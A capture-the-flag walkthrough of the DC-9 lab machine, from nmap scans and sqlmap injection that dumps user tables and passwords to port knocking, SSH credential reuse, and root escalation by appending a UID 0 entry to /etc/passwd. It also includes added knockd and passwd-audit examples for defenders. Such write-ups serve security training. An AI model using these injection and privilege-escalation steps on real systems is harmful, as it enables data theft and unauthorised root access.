
DCchallenges9

Information gathering

Environment

Subnet: 192.168.18.0/24

Kali: 192.168.18.131

Target: 192.168.18.142

Scan the subnet

kali@kali2020:~$ sudo nmap 192.168.18.0/24 -sn
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 20:27 CST
Nmap scan report for 192.168.18.2
Host is up (0.00039s latency).
MAC Address: 00:50:56:E0:DA:9A (VMware)
Nmap scan report for 192.168.18.142
Host is up (0.00043s latency).
MAC Address: 00:0C:29:C2:75:62 (VMware)
Nmap scan report for 192.168.18.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:FD:0E:3D (VMware)
Nmap scan report for 192.168.18.131
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.12 seconds

Scan the target's ports

kali@kali2020:~$ sudo nmap 192.168.18.142 -p- -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 20:35 CST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.02% done; ETC: 20:36 (0:00:00 remaining)
Nmap scan report for 192.168.18.142
Host is up (0.0014s latency).
Not shown: 65533 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:C2:75:62 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
kali@kali2020:~$

SQL injection

The site has a search box and a login form; check whether the search is injectable

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --dbs --batch

Three databases come back:

available databases [3]:
[*] information_schema
[*] Staff
[*] users

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D users --tables

Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D users -T UserDetails --columns

Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| password  | varchar(20)     |
| reg_date  | timestamp       |
| username  | varchar(30)     |
+-----------+-----------------+

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D users -T UserDetails -C username,password --dump

The result turns out to be the same data the display page already shows, so try the other database instead

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D Staff --tables

Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D Staff -T Users --columns

Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D Staff -T Users -C Username,Password --dump

Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

This yields admin / 856f5de590ef37314e7c3bdf6f8a66dc

The MD5 cracks to transorbital1

Dump the data from the other database as well

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D users -T UserDetails -C username,password --dump

Database: users
Table: UserDetails
[17 entries]
+-----------+---------------+
| username  | password      |
+-----------+---------------+
| marym     | 3kfs86sfd     |
| julied    | 468sfdfsd2    |
| fredf     | 4sfd87sfd1    |
| barneyr   | RocksOff      |
| tomc      | TC&TheBoyz    |
| jerrym    | B8m#48sd      |
| wilmaf    | Pebbles       |
| bettyr    | BamBam01      |
| chandlerb | UrAG0D!       |
| joeyt     | Passw0rd      |
| rachelg   | yN72#dsd      |
| rossg     | ILoveRachel   |
| monicag   | 3248dsds7s    |
| phoebeb   | smellycats    |
| scoots    | YR3BVxxxw87   |
| janitor   | Ilovepeepee   |
| janitor2  | Hawaii-Five-0 |
+-----------+---------------+

Try the credentials on manage.php: login succeeds

The bottom-left corner of the page shows a "File does not exist" message, which suggests a local file inclusion (LFI) vulnerability

The web server is Apache

Ran an LFI wordlist through Burp; nothing useful turned up

Next, check whether the accounts dumped earlier can log in over SSH

# username
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
#passwd
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

Every connection fails, even though port 22 appeared in the nmap port scan (listed as filtered)

A quick search shows this is the knockd service (port knocking)

knockd

The knockd configuration file is /etc/knockd.conf

The knock sequence uses three ports: 7469, 8475, 9842

By default port 22 is closed; it is opened only after those three ports have been hit in order.

Use nmap to hit the three ports in sequence

After knocking, connect to SSH again: the SSH port is now reachable
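For reference, this is what a server-side knockd configuration producing the behaviour described above looks like. It is an added illustration written in knockd's own config syntax, not the file from the DC-9 machine (the writeup never shows it); the iptables commands, timeout and the reverse "close" sequence follow knockd's sample configuration and are assumptions about how this box was set up.

```ini
; /etc/knockd.conf (illustrative; assumed, not copied from the target)
[options]
    UseSyslog

; SYN packets to 7469, 8475, 9842 in that order, within 5 seconds,
; add a firewall rule allowing the knocking IP to reach port 22.
[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 5
    tcpflags    = syn
    command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

; The reverse sequence removes that rule again (assumed to mirror openSSH).
[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 5
    tcpflags    = syn
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
```

From the auditing side, this is why the earlier -sV scan reported 22/tcp as filtered rather than closed: sshd is listening, but the firewall drops the SYN until the sequence has been seen from that source address. Each completed sequence is also logged via syslog, which is the place to look when verifying who opened the port.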

In the end three accounts can log in over SSH:

chandlerb  UrAG0D!
joeyt      Passw0rd
janitor    Ilovepeepee

In janitor's home directory there is a hidden folder containing a password file

# passwords-found-on-post-it-notes.txt 

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Trying these against the remaining users yields one more account:

fredf B4-Tru3-001

Privilege escalation

fredf can run /opt/devstuff/dist/test/test with sudo without a password

Its usage message indicates that test is a Python script

Look for test.py

find / -name "test.py" 2>/dev/null

Two files are found:

/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py

Only the first one is likely to matter

cat /opt/devstuff/test.py

It takes two arguments and appends the contents of the first file to the second file

Use openssl to generate a password hash for a new user

openssl passwd -1 -salt Mamor 123456
$1$Mamor$y58eSo9.PqQRr.NOp4Ltp/

Build a passwd entry for the user

Mamor:$1$Mamor$y58eSo9.PqQRr.NOp4Ltp/:0:0::/root:/bin/bash

echo "Mamor:$1$Mamor$y58eSo9.PqQRr.NOp4Ltp/:0:0::/root:/bin/bash" > /tmp/mamor

sudo ./test /tmp/mamor /etc/passswd

The attempt fails: nothing usable gets written

cat /tmp/mamor

The string that was written is not the original one: inside double quotes the shell expands $1, $Mamor and $y58eSo9 as variables, all of which are empty here, so the hash is mangled before it ever reaches the file.

Try single quotes

echo 'Mamor:$1$Mamor$y58eSo9.PqQRr.NOp4Ltp/:0:0::/root:/bin/bash' > /tmp/mamor1

Still nothing written

openssl passwd -1 -salt test test

$1$test$pi/xDtU5WFVRqYS6BMU8X/

echo 'test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0::/root:/bin/bash' >> /tmp/testtest

sudo ./test /tmp/testtest /etc/passwd

cat /etc/passwd

test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0::/root:/bin/bash

This time the write succeeds
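The entry appended above leaves two traces that a host audit should catch: a second UID 0 account, and a crypt hash sitting in the password field of /etc/passwd instead of the usual "x". The following POSIX sh script checks a passwd-format file for both. It is an added example, not part of the original writeup or of the DC-9 machine; the sample file it builds is constructed here, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a passwd-format file for
# the traces the appended entry above leaves behind:
#   1. an account other than root with UID 0
#   2. a crypt hash stored in the password field instead of "x"
# Prints one finding per line and always exits 0, so it is safe under set -e.
audit_passwd() {
    awk -F: '
        NF < 7 { next }                                   # skip malformed lines
        $3 == 0 && $1 != "root" { print "extra UID 0 account: " $1 }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print "hash in passwd field: " $1 }
    ' "$1"
}

# Number of findings for a file, printed as a plain integer.
count_findings() {
    audit_passwd "$1" | awk 'END { print NR }'
}

# Constructed sample: a short passwd excerpt plus the line the writeup appended.
# The heredoc delimiter is quoted, so $1, $test and $pi are NOT expanded here;
# with an unquoted delimiter (or an echo in double quotes) the shell would
# replace them with empty strings and the hash would be mangled.
make_sample() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001::/home/fredf:/bin/bash
test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0::/root:/bin/bash
EOF
    echo "$f"
}

# Stand-alone run: audit the constructed sample, then clean up.
# Against a live system you would call: audit_passwd /etc/passwd
sample=$(make_sample)
audit_passwd "$sample"
rm -f "$sample"
```

On the constructed sample this reports two findings, both for the "test" account. The same two checks are the reason the sudo rule on this box is the real defect: a NOPASSWD script that appends one arbitrary file to another is a root-level write to any file, and /etc/passwd is simply the most convenient target for it.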
